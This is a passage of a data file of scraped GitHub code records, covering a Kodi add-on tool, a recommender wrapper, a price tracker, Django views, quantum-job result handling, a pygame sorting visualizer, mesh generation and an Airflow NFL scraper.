re.sub('[^0-9]','',FREEMEM)\r\n BUFFER_F = int(BUFFER_F) / 3\r\n BUFFERSIZE = trunc(BUFFER_F * 1024 * 1024)\r\n try: KODIV = float(xbmc.getInfoLabel(\"System.BuildVersion\")[:4])\r\n except: KODIV = 16\r\n\r\n\r\n \"\"\",customlabel='Cancel'\"\"\"\r\n choice = dialog.yesno(AddonTitle, 'Based on your free Memory your optimal buffersize is: \\n' + str(BUFFERSIZE) + ' Bytes' + ' (' + str(round(BUFFER_F)) + ' MB)' + '\\n' + 'Note that your current advanced settings will be overwritten!' + '\\n' + 'Choose an Option below or press ESC ESC to abort.', yeslabel='Use Optimal',nolabel='Input a Value' )\r\n if choice == 1:\r\n with open(XML_FILE, \"w\") as f:\r\n if KODIV >= 17: xml_data = xml_data_advSettings_New(str(BUFFERSIZE))\r\n else: xml_data = xml_data_advSettings_old(str(BUFFERSIZE))\r\n\r\n f.write(xml_data)\r\n dialog.ok(AddonTitle,'Buffer Size Set to: ' + str(BUFFERSIZE) + '\\n' + 'Please restart Kodi for settings to apply.')\r\n\r\n elif choice == 0:\r\n BUFFERSIZE = _get_keyboard( default=str(BUFFERSIZE), heading=\"INPUT BUFFER SIZE (Bytes) or ESC/Cancel to abort\", cancel=\"-\")\r\n if BUFFERSIZE != \"-\":\r\n with open(XML_FILE, \"w\") as f:\r\n if KODIV >= 17: xml_data = xml_data_advSettings_New(str(BUFFERSIZE))\r\n else: xml_data = xml_data_advSettings_old(str(BUFFERSIZE))\r\n f.write(xml_data)\r\n dialog.ok(AddonTitle,'Buffer Size Set to: ' + str(BUFFERSIZE) + '\\n' + 'Please restart Kodi for settings to apply.')\r\n\r\n\r\ndef open_Settings():\r\n open_Settings = xbmcaddon.Addon(id=AddonID).openSettings()\r\n\r\ndef _get_keyboard( default=\"\", heading=\"\", hidden=False, cancel=\"\" ):\r\n \"\"\" shows a keyboard and returns a value \"\"\"\r\n if cancel == \"\":\r\n cancel=default\r\n keyboard = xbmc.Keyboard( default, heading, hidden )\r\n keyboard.doModal()\r\n if ( keyboard.isConfirmed() ):\r\n return unicode( keyboard.getText())\r\n return cancel\r\n\r\n\r\n############################## END #########################################","repo_name":"peno64/script.ezmaintenanceplus","sub_path":"resources/lib/modules/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"82"}
+{"seq_id":"31343209605","text":"#!/usr/bin/env 
python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 18/12/18\n\n@author: Maurizio Ferrari Dacrema\n\"\"\"\n\nfrom Base.BaseCBFRecommender import BaseItemCBFRecommender\nfrom Base.BaseMatrixFactorizationRecommender import BaseMatrixFactorizationRecommender\nfrom Base.BaseTempFolder import BaseTempFolder\n\nimport os, shutil\n\nfrom numpy import genfromtxt\nfrom Base.Recommender_utils import check_matrix\nimport scipy.sparse as sps\nimport numpy as np\nimport scipy.io\n\ntry:\n import matlab.engine\nexcept ImportError:\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Unable to import Matlab engine. Fitting of a new model will not be possible\")\n\n\n\nclass CollaborativeDL_Matlab_RecommenderWrapper(BaseItemCBFRecommender, BaseMatrixFactorizationRecommender, BaseTempFolder):\n\n\n RECOMMENDER_NAME = \"CollaborativeDL_Matlab_RecommenderWrapper\"\n\n DEFAULT_GSL_LIB_FOLDER = '/usr/lib/x86_64-linux-gnu/'\n\n\n\n def __init__(self, URM_train, ICM_train):\n super(CollaborativeDL_Matlab_RecommenderWrapper, self).__init__(URM_train, ICM_train)\n\n def fit(self,\n batch_size = 128,\n para_lv=10,\n para_lu=1,\n para_ln=1e3,\n epoch_sdae=1000,\n epoch_dae=500,\n temp_file_folder = None,\n gsl_file_folder = None):\n\n\n self.temp_file_folder = self._get_unique_temp_folder(input_temp_file_folder=temp_file_folder)\n\n if gsl_file_folder is None:\n print(\"{}: Using default gsl folder '{}'\".format(self.RECOMMENDER_NAME, self.DEFAULT_GSL_LIB_FOLDER))\n self.gsl_folder = self.DEFAULT_GSL_LIB_FOLDER\n else:\n print(\"{}: Using gsl folder '{}'\".format(self.RECOMMENDER_NAME, gsl_file_folder))\n self.gsl_folder = gsl_file_folder\n\n\n\n\n # input_user_file = 'ctr-data/folder45/cf-train-1-users.dat'\n # input_item_file = 'ctr-data/folder45/cf-train-1-items.dat'\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Saving temporary data files for matlab use ... \")\n\n n_features = self.ICM_train.shape[1]\n\n content_file = self.temp_file_folder + \"ICM.mat\"\n scipy.io.savemat(content_file, {\"X\": self.ICM_train.toarray()}, appendmat=False)\n\n input_user_file = self.temp_file_folder + \"cf-train-users.dat\"\n self._save_dat_file_from_URM(self.URM_train, input_user_file)\n\n input_item_file = self.temp_file_folder + \"cf-train-items.dat\"\n self._save_dat_file_from_URM(self.URM_train.T, input_item_file)\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Saving temporary data files for matlab use ... done!\")\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Calling matlab.engine ... \")\n\n eng = matlab.engine.start_matlab()\n\n matlab_script_directory = os.getcwd() + \"/Conferences/KDD/CollaborativeDL_github_matlab/example\"\n matlab_backward_path_prefix = \"../../../../\"\n eng.cd(matlab_script_directory)\n\n # para_pretrain refers to a preexisting trained model. Setting it to False in order to pretrain from scratch\n load_previous_pretrained_model = False\n\n eng.cdl_main_with_params(\n matlab_backward_path_prefix + self.temp_file_folder,\n self.gsl_folder,\n matlab_backward_path_prefix + input_user_file,\n matlab_backward_path_prefix + input_item_file,\n matlab_backward_path_prefix + content_file,\n para_lv,\n para_lu,\n para_ln,\n epoch_sdae,\n epoch_dae,\n load_previous_pretrained_model,\n batch_size,\n n_features,\n nargout=0,)\n\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Calling matlab.engine ... 
done!\")\n\n os.remove(content_file)\n os.remove(input_user_file)\n os.remove(input_item_file)\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Loading trained model from temp matlab files ... \")\n self.USER_factors = genfromtxt(self.temp_file_folder + \"final-U.dat\", delimiter=' ')\n self.ITEM_factors = genfromtxt(self.temp_file_folder + \"final-V.dat\", delimiter=' ')\n\n assert self.USER_factors.shape[0] == self.URM_train.shape[0]\n assert self.ITEM_factors.shape[0] == self.URM_train.shape[1]\n\n assert self.USER_factors.shape[1] == self.ITEM_factors.shape[1]\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Loading trained model from temp matlab files ... done!\")\n self._clean_temp_folder(temp_file_folder=self.temp_file_folder)\n\n\n\n def _save_dat_file_from_URM(self, URM_to_save, file_full_path):\n\n file_object = open(file_full_path, \"w\")\n\n URM_to_save = sps.csr_matrix(URM_to_save)\n\n\n n_rows, n_cols = URM_to_save.shape\n\n for row_index in range(n_rows):\n\n start_pos = URM_to_save.indptr[row_index]\n end_pos = URM_to_save.indptr[row_index +1]\n\n profile = URM_to_save.indices[start_pos:end_pos]\n\n new_line = \"{} {}\\n\".format(len(profile), \" \".join(str(element) for element in profile))\n\n file_object.write(new_line)\n\n file_object.close()\n","repo_name":"MaurizioFD/RecSys2019_DeepLearning_Evaluation","sub_path":"Conferences/KDD/CollaborativeDL_our_interface/CollaborativeDL_Matlab_RecommenderWrapper.py","file_name":"CollaborativeDL_Matlab_RecommenderWrapper.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","stars":968,"dataset":"github-code","pt":"82"} +{"seq_id":"943170075","text":"import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nfrom env import URL, HEADER, EMAIL\nimport lxml\n\n\ndef main():\n # Get amazon webpage\n response = requests.get(url=URL, headers=HEADER)\n response.raise_for_status()\n html_content = response.text\n\n # Scrap for product price\n soup = BeautifulSoup(html_content, \"lxml\")\n price_string = soup.select_one(\"#priceblock_ourprice\").text\n # Formatting the price to float\n price_without_euro = price_string.split(\"\\xa0\")[0]\n string_list = list(price_without_euro)\n string_list[string_list.index(\",\")] = \".\"\n price = float(\"\".join(string_list))\n\n # Send email if price is lower than 250 Euro\n if price < 250:\n with smtplib.SMTP(\"smtp.gmail.com\") as connection:\n connection.starttls()\n connection.login(user=EMAIL[\"my_email\"], password=EMAIL[\"my_pass\"])\n connection.sendmail(from_addr=EMAIL[\"my_email\"],\n to_addrs=EMAIL[\"to_email\"],\n msg=\"Amazon Price Check\\n\\nThe price of your searched product\"\n f\"is lower than 250 => {price}.\\n\\nBest Regards\\nPrice-Bot\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"EderLukas/python_portfolio","sub_path":"amazon_price_tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40539722594","text":"from django.views import generic\nfrom baseballsimulator.forms import FormAway, FormHome\nfrom django.shortcuts import render\n\nfrom .models import Batter, Pitcher, League \nfrom baseballsimulator.custom.correct_player import check_names, get_correct_player\nfrom baseballsimulator.custom.simulation import simulate\n\n# display the form to fill out player names\ndef index(request):\n formAway = FormAway()\n formHome = FormHome()\n context = {\n 'formAway': formAway,\n 
'formHome': formHome,\n }\n return render(request, 'baseballsimulator/index.html', context)\n\n# check the player names - if successful, call results and if not, display\n# the previous form with the error messages\ndef results(request):\n batterNamesAway = [request.GET.get('batterAway1'), \n request.GET.get('batterAway2'),\n request.GET.get('batterAway3'),\n request.GET.get('batterAway4'),\n request.GET.get('batterAway5'),\n request.GET.get('batterAway6'),\n request.GET.get('batterAway7'),\n request.GET.get('batterAway8'),\n request.GET.get('batterAway9')]\n batterNamesHome = [request.GET.get('batterHome1'), \n request.GET.get('batterHome2'),\n request.GET.get('batterHome3'),\n request.GET.get('batterHome4'),\n request.GET.get('batterHome5'),\n request.GET.get('batterHome6'),\n request.GET.get('batterHome7'),\n request.GET.get('batterHome8'),\n request.GET.get('batterHome9')]\n pitcherNameAway = request.GET.get('pitcherAway')\n pitcherNameHome = request.GET.get('pitcherHome')\n\n invalidNames = check_names(batterNamesAway, pitcherNameAway, batterNamesHome, pitcherNameHome)\n \n if invalidNames:\n formAway = FormAway(initial={'batterAway1': batterNamesAway[0],\n 'batterAway2': batterNamesAway[1],\n 'batterAway3': batterNamesAway[2],\n 'batterAway4': batterNamesAway[3],\n 'batterAway5': batterNamesAway[4],\n 'batterAway6': batterNamesAway[5],\n 'batterAway7': batterNamesAway[6],\n 'batterAway8': batterNamesAway[7],\n 'batterAway9': batterNamesAway[8],\n 'pitcherAway': pitcherNameAway})\n formHome = FormHome(initial={'batterHome1': batterNamesHome[0],\n 'batterHome2': batterNamesHome[1],\n 'batterHome3': batterNamesHome[2],\n 'batterHome4': batterNamesHome[3],\n 'batterHome5': batterNamesHome[4],\n 'batterHome6': batterNamesHome[5],\n 'batterHome7': batterNamesHome[6],\n 'batterHome8': batterNamesHome[7],\n 'batterHome9': batterNamesHome[8],\n 'pitcherHome': pitcherNameHome})\n context = {\n 'formAway': formAway,\n 'formHome': formHome,\n 'invalidNames': invalidNames,\n }\n return render(request, 'baseballsimulator/index.html', context)\n else:\n batterListAway = []\n batterListHome = []\n for batterNameAway, batterNameHome in zip(batterNamesAway, batterNamesHome):\n batterListAway.append(get_correct_player(batterNameAway, 'batter'))\n batterListHome.append(get_correct_player(batterNameHome, 'batter'))\n pitcherAway = get_correct_player(pitcherNameAway, 'pitcher')\n pitcherHome = get_correct_player(pitcherNameHome, 'pitcher')\n league = League.objects.get(year=2017)\n result = simulate(500,\n batterListAway, pitcherAway, \n batterListHome, pitcherHome,\n league)\n context = {\n 'winningPercentageAway': result[0],\n 'winningPercentageHome': result[1],\n 'batterNamesAway': batterNamesAway,\n 'batterNamesHome': batterNamesHome,\n 'pitcherNameAway': pitcherNameAway,\n 'pitcherNameHome': pitcherNameHome,\n }\n return render(request, 'baseballsimulator/results.html', context)\n","repo_name":"junsooshin/baseballsimulator-django","sub_path":"baseballsimulator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21977103213","text":"from db import manager\nfrom db import migrations\nfrom typing import Any\ndef main(args: Any = None) -> None:\n manager.dictionaryCreateTables()\n manager.coursesCreateTable()\n manager.outboxCreateTable()\n\n#def migration1(args: Any = None) -> None:\n# manager.coursesAddColumn();\n\nif __name__ == '__main__':\n main()\n 
migrations.migration1()","repo_name":"Tais1990/insbit.ru","sub_path":"db.init.py","file_name":"db.init.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30328466456","text":"from django.urls import path\nfrom .views import MedicineListView, MedicineSpecificView, ReminderListView, ReminderSpecificView, ReminderUserView, PrescriptionListView, PrescriptionSpecificView, PrescriptionUserView, NotificationsView\n\nurlpatterns = [\n path('medicines/', MedicineListView.as_view()),\n path('medicines//', MedicineSpecificView.as_view()),\n path('reminders/', ReminderListView.as_view()),\n path('reminders//', ReminderSpecificView.as_view()),\n path('reminders/user/', ReminderUserView.as_view()),\n path('prescriptions/', PrescriptionListView.as_view()),\n path('prescriptions//', PrescriptionSpecificView.as_view()),\n path('prescriptions/user/', PrescriptionUserView.as_view()),\n path('reminders/notifications/', NotificationsView.as_view())\n]\n","repo_name":"jennikate/remember-your-meds","sub_path":"prescriptions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"41738865325","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 29 12:34:31 2022\n\n@author: jjser\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#### #### Initializing Values of the Structured Grid #### ####\n\n# Parameter Values of Zeta\n # angle\nZ0 = 0\nZ1 = 2*np.pi\nZnum = 52\n# Znum = 50\n\n# Paramater Values of Eta\n # axes diameter\nN0 = 0.255 # {set on Nov 30} \nN1 = 3.72 # {set on Dec 1 } \nNnum = 52\n\n# Create Zeta and Eta Values then Create Grid\n''' #Do not Edit '''\nZ = np.linspace(Z0, Z1, Znum+1)\nN = np.linspace(N0, N1, Nnum+1)\nZgrid, Ngrid = np.meshgrid(Z, N)\n\n# Draws Structured Grid\nfig, ax = plt.subplots()\n# Draws vertical lines\nfor i in np.arange(len(Z)):\n ax.plot(Zgrid.T[i], Ngrid.T[i], c='blue')\n# Draws horizontal lines\nfor j in np.arange(len(N)):\n ax.plot(Zgrid[j], Ngrid[j], c='blue') \nax.set_title('Unstructured Grid')\nax.set_xlim([Z0,Z1])\nax.set_ylim([N0,N1])\nplt.show()\n\n#### #### Mapping Structured Grid to Unstructured Grid #### ####\nxgrid = np.zeros((len(Z), len(N)))\nygrid = np.zeros((len(Z), len(N)))\n\n# Mapping\nfor i in np.arange(len(Z)):\n for j in np.arange(len(N)):\n xgrid[i][j] = np.cosh(N[j]) * np.cos(Z[i])\n ygrid[i][j] = np.sinh(N[j]) * np.sin(Z[i])\n \n#### Draws Unstructured Grid\nfig, ax = plt.subplots()\n# Draws the Ellipse itself\nfor i in np.arange(len(N)):\n ax.plot(xgrid.T[i], ygrid.T[i], c='green')\nfor j in np.arange(len(Z)):\n ax.plot(xgrid[j], ygrid[j], c='green') \n# Radial\nax.plot(xgrid[int(np.floor(len(Z)/4))][-2], ygrid[int(np.floor(len(Z)/4))][-2], c='blue', marker=\".\", markersize=10) \nax.plot(xgrid[int(np.floor(len(Z)/4))][-1], ygrid[int(np.floor(len(Z)/4))][-1], c='blue', marker=\".\", markersize=10) \n# Angular\nax.plot(xgrid[0][-1], ygrid[0][-1], c='red', marker=\".\", markersize=10) \nax.plot(xgrid[1][-1], ygrid[1][-1], c='red', marker=\".\", markersize=10) \n\n\"\"\" # Dec 1 Addition for Zooming in \"\"\"\nax.set_title('Unstructured Grid')\n#ax.set_xlim([-2,2])\n#ax.set_ylim([-2,2])\n\nplt.show()\n\n\"\"\" #November 30 \"\"\"\n#### Compute Jacobian ####\nJ = np.zeros((len(Z), len(N)))\n\nfor i in np.arange(len(Z)):\n for j in np.arange(len(N)):\n J[i][j] = np.cosh(N[j])**2 * np.sin(Z[i])**2 + \\\n 
np.sinh(N[j])**2 * np.cos(Z[i])**2\n \nZx = np.zeros((len(Z), len(N)))\nNx = np.zeros((len(Z), len(N)))\nZy = np.zeros((len(Z), len(N)))\nNy = np.zeros((len(Z), len(N)))\n\nfor i in np.arange(len(Z)):\n for j in np.arange(len(N)):\n Zx[i][j] = np.cosh(N[j]) * np.sin(Z[i]) / J[i][j]\n Nx[i][j] = -np.sinh(N[j]) * np.cos(Z[i]) / J[i][j]\n Zy[i][j] = -np.sinh(N[j]) * np.cos(Z[i]) / J[i][j]\n Ny[i][j] = -np.cosh(N[j]) * np.sin(Z[i]) / J[i][j]\n\nfrom matplotlib import cm\n'''\nfig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\nsurf = ax.plot_surface(xgrid,ygrid,J,cmap=cm.coolwarm,linewidth=0, antialiased=False)\nfig.colorbar(surf, shrink=0.5, aspect=5)\n'''\n# December 1 Modification\nfig = plt.figure()\nax = plt.axes(projection='3d')\nsurf = ax.plot_surface(xgrid,ygrid,J,cmap=cm.coolwarm,linewidth=0, antialiased=False)\nfig.colorbar(surf, shrink=0.25, aspect=10, fraction=0.1, orientation='horizontal')\nax.view_init(90, 90)\n#ax.set_xlim([-2,2])\n#ax.set_ylim([-2,2])\nplt.show()\n\n# December 3 Addition\nplt.contourf(xgrid, ygrid, J)\nplt.xlim([-1.25,1.25])\nplt.ylim([-1.25,1.25])\nplt.show()\n\n\"\"\" # December 1 \"\"\"\n# distance is increased to 20 times: N1 = 3.72\n# added axes limits\n","repo_name":"jjserdo/Fluids-and-CFD","sub_path":"AEM 5253 - CFD/Project/MeshGen.py","file_name":"MeshGen.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"73243830989","text":"n, m = map(int, input().split())\r\nONE_LAYER = \"WB\" * (m // 2 + 1)\r\n\r\ndef repainting(layer, start):\r\n cnt = 0\r\n check = [0] * len(layer)\r\n for i, l in enumerate(layer):\r\n if ONE_LAYER[start] != l:\r\n check[i] = 1\r\n start += 1\r\n return check\r\n\r\ncnts1, cnts2 = [0] * n, [0] * n\r\nstart1, start2 = 0, 1\r\n\r\nfor i in range(n):\r\n layer = input()\r\n cnts1[i] = repainting(layer, start1)\r\n cnts2[i] = repainting(layer, start2)\r\n start1, start2 = start2, start1\r\n\r\nans = float('inf')\r\nfor i in range(n - 7):\r\n tmp1 = cnts1[i:i+8]\r\n tmp2 = cnts2[i:i+8]\r\n for j in range(m - 7):\r\n s1, s2 = 0, 0\r\n for i, t in enumerate(tmp1):\r\n s1 += sum(t[j:j+8])\r\n s2 += sum(tmp2[i][j:j+8])\r\n if s1 < ans:\r\n ans = s1\r\n if s2 < ans:\r\n ans = s2\r\nprint(ans)\r\n \r\n","repo_name":"qja1998/boj","sub_path":"백준/Silver/1018. 
체스판 다시 칠하기/체스판 다시 칠하기.py","file_name":"체스판 다시 칠하기.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"3464802805","text":"import cv2\nimport os\n\npath = \"/home/ubuntu/pythonProject/data/lena.jpg\"\nsrc = cv2.imread(path)\n\nif os.path.isfile(path):\n    gray = cv2.imread(path, 0)\nelse:\n    print(\"File does not exist.\")\n\n# Merge the single gray channel back into a 3-channel image\n\nimgRGB = cv2.merge((gray, gray, gray))\n\ncv2.imshow('gray', gray)\ncv2.imshow('imgRGB', imgRGB)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"rhehd721/Bit_opencv","sub_path":"imageEx3.py","file_name":"imageEx3.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"43728262809","text":"import json\nfrom json import JSONDecodeError\n\nfrom qiskit_ibm_runtime import QiskitRuntimeService, RuntimeDecoder, RuntimeJobFailureError, RuntimeJobMaxTimeoutError\n\nfrom gibbs_functions import print_multiple_results\n\n\n# Deprecated\ndef decode_interim_results(data, N=1):\n\tresults = []\n\tfor i in reversed(data):\n\t\ttry:\n\t\t\tline = json.loads(i, cls=RuntimeDecoder)\n\t\texcept JSONDecodeError:\n\t\t\tpass\n\t\telse:\n\t\t\t# Only append dictionary interim results\n\t\t\tif isinstance(line, dict) and line.get('final'):\n\t\t\t\tresults.append(line)\n\n\tmultiple_results = [results[i:i + N] for i in range(0, len(results), N)]\n\n\treturn multiple_results\n\n\ndef main():\n\tservice = QiskitRuntimeService(name='personal')\n\tjobs = service.jobs(limit=10, skip=0)\n\tappend = True  # Append results or overwrite\n\tfor job in jobs:\n\t\tjob_id = job.job_id()\n\t\t# Get job results\n\t\ttry:\n\t\t\tresults = job.result()\n\t\texcept RuntimeJobMaxTimeoutError:\n\t\t\tprint(f\"Runtime job {job_id} timed out.\")\n\t\t\tcontinue\n\t\texcept RuntimeJobFailureError:\n\t\t\tprint(f\"Runtime job {job_id} failed.\")\n\t\t\tcontinue\n\t\telse:\n\t\t\tprint(f\"Runtime job {job_id} succeeded.\")\n\n\t\t# These will be the same for every batched run in the job\n\t\tbackend_name = results[0][0].get('backend')\n\t\tn = results[0][0].get('n')\n\t\tJ = results[0][0].get('J')\n\t\th = results[0][0].get('h')\n\t\tshots = results[0][0].get('shots')\n\t\tnoise_model = results[0][0].get('noise_model')\n\n\t\tfolder = f'jobs/{backend_name}'\n\t\tif isinstance(noise_model, str):\n\t\t\tfolder += f'_{noise_model}'\n\t\tfolder += f'/n_{n}_J_{J:.2f}_h_{h:.2f}_shots_{shots}'\n\n\t\tprint_multiple_results(results, output_folder=folder, job_id=job_id, backend=backend_name, append=append)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"mirkoconsiglio/VariationalGibbsStatePreparation","sub_path":"qiskit_runtime/job_results.py","file_name":"job_results.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"542360078","text":"from django.urls import path\r\n\r\nfrom adds_blog.views import Home, ArticleDetail, search #category_maison\r\n\r\n\r\napp_name = \"articles\"\r\nurlpatterns = [\r\n    path('', Home.as_view(), name=\"home\"),\r\n    path('/', ArticleDetail.as_view(), name='article'),\r\n    path('article/recherche', search, name='search'),\r\n    #path('article/categorie', category_maison, name='category_maison'),\r\n
]\r\n","repo_name":"IBonane/AppWebDePetitesAnnonces","sub_path":"blog/adds_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"75064457867","text":"import pygame\nimport random\nimport math\n\npygame.init()\n\n\nclass DrawInfo:\n BLACK = 0, 0, 0\n WHITE = 255, 255, 255\n GREEN = 0, 255, 0\n PINK = 251, 72, 196\n BACKGROUND_COLOR = 12, 12, 12\n\n GRAY = [(128, 128, 128),\n (160, 160, 160),\n (192, 192, 192)]\n\n FONT = pygame.font.SysFont('comicsans', 15)\n LARGE_FONT = pygame.font.SysFont('comicsans', 20)\n SIDE_PAD = 100 # px\n TOP_PAD = 150 # px\n\n def __init__(self, width, height, lst):\n self.width = width\n self.height = height\n\n self.window = pygame.display.set_mode((width, height))\n pygame.display.set_caption(\"Sorting Visualization\")\n self.set_list(lst)\n\n def set_list(self, lst):\n self.lst = lst\n self.min_val = min(lst)\n self.max_val = max(lst)\n\n self.block_width = math.floor((self.width - self.SIDE_PAD) / len(lst))\n self.block_height = math.floor((self.height - self.TOP_PAD) / (self.max_val - self.min_val))\n self.start_x = self.SIDE_PAD // 2 # start at half of padding\n\n\ndef generate_starting_list(n, min_val, max_val):\n lst = []\n for _ in range(n):\n val = random.randint(min_val, max_val)\n lst.append(val)\n return lst\n\n\ndef draw(draw_info):\n draw_info.window.fill(draw_info.BACKGROUND_COLOR)\n\n controls = draw_info.FONT.render(\"R - Reset |\"\n \" SPACE - Start Sorting |\"\n \" A - Ascending |\"\n \" D - Descending\", 1, draw_info.WHITE) # antialias\n draw_info.window.blit(controls, (draw_info.width/2 - controls.get_width()/2, 5))\n\n sortText = draw_info.FONT.render(\"B - Bubble Sort |\"\n \" I - Insertion Sort\", 1, draw_info.WHITE) # antialias\n draw_info.window.blit(sortText, (draw_info.width / 2 - sortText.get_width() / 2, 35))\n\n draw_list(draw_info)\n pygame.display.update()\n\n\ndef draw_list(draw_info, color_positions={}, clear_bg=False):\n lst = draw_info.lst\n\n if clear_bg:\n clear_rect = (draw_info.SIDE_PAD//2, draw_info.TOP_PAD,\n draw_info.width - draw_info.SIDE_PAD, draw_info.height - draw_info.TOP_PAD)\n\n pygame.draw.rect(draw_info.window, draw_info.BACKGROUND_COLOR, clear_rect)\n\n for i, val in enumerate(lst):\n x = draw_info.start_x + i * draw_info.block_width\n y = draw_info.height - (val - draw_info.min_val) * draw_info.block_height\n\n color = draw_info.GRAY[i % 3] # cycle through the 3 grays\n\n if i in color_positions:\n color = color_positions[i]\n\n # draw the bar\n pygame.draw.rect(draw_info.window, color, (x, y, draw_info.block_width, draw_info.height))\n\n if clear_bg:\n pygame.display.update()\n\n\n# algorythms\ndef bubble_sort(draw_info, ascending=True): # true default\n lst = draw_info.lst\n\n for i in range(len(lst) - 1):\n for j in range(len(lst) - 1 - i):\n num1 = lst[j]\n num2 = lst[j + 1]\n\n if (num1 > num2 and ascending) or (num1 < num2 and not ascending):\n lst[j], lst[j + 1] = lst[j + 1], lst[j] # swap values in one line without temp values\n draw_list(draw_info, {j: draw_info.GREEN, j + 1: draw_info.PINK}, True)\n yield True # pauses the function until it is called again (yield control)\n return lst\n\n\n# render screen\ndef main():\n clock = pygame.time.Clock() # regulates loop time\n\n n = 100\n min_val = 0\n max_val = 300\n\n lst = generate_starting_list(n, min_val, max_val)\n draw_info = DrawInfo(800, 600, lst)\n sorting = False\n ascending = True\n\n sorting_alg = 
bubble_sort\n sorting_alg_name = \"Bubble Sort\"\n sorting_alg_generator = None\n\n run = True\n while run:\n clock.tick(4800)\n\n if sorting:\n try:\n next(sorting_alg_generator)\n except StopIteration:\n sorting = False\n else:\n draw(draw_info)\n\n # render display\n pygame.display.update()\n\n # check for events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n if event.type != pygame.KEYDOWN:\n continue\n if event.key == pygame.K_r: # reset the list on R\n lst = generate_starting_list(n, min_val, max_val)\n draw_info.set_list(lst)\n elif event.key == pygame.K_SPACE and sorting == False: # start sorting on SPACE if not already\n sorting = True\n sorting_alg_generator = sorting_alg(draw_info, ascending)\n elif event.key == pygame.K_a and not sorting: # ascending\n ascending = True\n elif event.key == pygame.K_d and not sorting: # descending\n ascending = False\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"StJaker/python-sorting-visualizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"823424726","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom airflow.decorators import task\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\nfrom psycopg2.extras import execute_batch\nfrom datetime import datetime\n\n\n@task()\ndef nfl_web_scrapper() -> list:\n nfl_projections_players = []\n for i in range(1, 846, 25):\n offset = str(i)\n base_projections = f\"https://fantasy.nfl.com/research/projections?offset={offset}&position=O&sort=projectedPts&statCategory=projectedStats&statSeason=2022&statType=seasonProjectedStats\"\n res = requests.get(base_projections)\n\n soup = BeautifulSoup(res.text, \"html.parser\")\n enrty_time = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%f%z\")\n\n projections = soup.find_all(\n \"td\", {\"class\": \"stat projected numeric sorted last\"}\n )\n names = soup.find_all(\"td\", {\"class\": \"playerNameAndInfo first\"})\n players = [\n [\n names[i]\n .find(\"a\")\n .get_text()\n .replace(\"'\", \"\")\n .replace('\"', \"\")\n .replace(\" III\", \"\")\n .replace(\" II\", \"\")\n .replace(\"Gabe\", \"Gabriel\")\n .replace(\" Jr.\", \"\"),\n re.split(\"=\", names[i].find(\"a\")[\"href\"])[-1],\n names[i].find(\"a\")[\"href\"],\n str(projections[i])[47:-5]\n ]\n for i in range(len(names))\n ]\n nfl_projections_players.extend(players)\n nfl_players_preped = [\n [\n i[0].split(\" \")[0], #firstname\n i[0].split(\" \")[-1], #last_name\n i[0], #fullname\n i[1], #nfl_player_id\n i[2], #slug\n int(float(i[3])),\n enrty_time\n ]\n for i in nfl_projections_players\n ] \n\n return nfl_players_preped\n\n\n@task()\ndef data_validation(nfl_players_preped: list):\n return nfl_players_preped if len(nfl_players_preped) > 0 else False\n\n\n@task()\ndef nfl_player_load(nfl_players_preped: list):\n\n pg_hook = PostgresHook(postgres_conn_id=\"postgres_akv\")\n conn = pg_hook.get_conn()\n\n cursor = conn.cursor()\n print(\"Connection established\")\n\n execute_batch(\n cursor,\n \"\"\"\n INSERT INTO dynastr.nfl_player_projections (\n player_first_name,\n player_last_name,\n player_full_name,\n nfl_player_id,\n slug,\n total_projection,\n insert_date\n ) \n VALUES (%s,%s,%s,%s,%s,%s,%s)\n ON CONFLICT (nfl_player_id)\n DO UPDATE SET player_first_name = 